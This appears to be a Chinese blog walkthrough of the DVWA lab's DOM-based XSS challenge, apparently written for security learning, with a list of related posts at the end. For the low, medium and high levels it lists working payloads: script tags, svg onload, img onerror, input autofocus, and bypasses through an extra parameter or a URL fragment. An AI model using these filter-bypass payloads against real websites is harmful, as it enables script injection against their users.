【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦

一、低级low

拼接的url样式:​​​​​​​

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

<script>alert("假客套")</script>

二、中级middle

拼接的url样式:​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下四选一

</select><svg onload=alert('假客套');>

</select><img src=x onerror=alert("假客套")>

注意这里的autofocus会一直自动加载弹窗,不加无效

<select><input onfocus = alert('假客套') autofocus/>

"><input onfocus = alert('假客套') autofocus/>

三、高级high

拼接的url样式:

​​​​​​​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下二选一

自定义一个参数名,拼接假的采纳数传递过去,比如不存在的name

&name=<script>alert("假客套")</script>

# 注释掉后续不传给后端,也不过滤

#<script>alert("假客套")</script>
相关推荐
假客套2 小时前
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
网络安全·xss·dvwa靶场·dvwa xss靶场·web渗透、
阿宝分享技术2 小时前
从xss到任意文件读取
前端·xss
kuber09097 小时前
雷池社区版新版本功能防绕过人机验证解析
网络安全
溯Sec8 小时前
搜索引擎之shodan(一):初始化及安装
网络·安全·web安全·搜索引擎·网络安全·系统安全·安全架构
0DayHP15 小时前
HTB:PermX[WriteUP]
网络安全
亿林数据20 小时前
网络安全等级保护制度详解:一文掌握核心要点
网络安全·等保测评
duliduli121920 小时前
盘点 2024 十大免费/开源 WAF
网络安全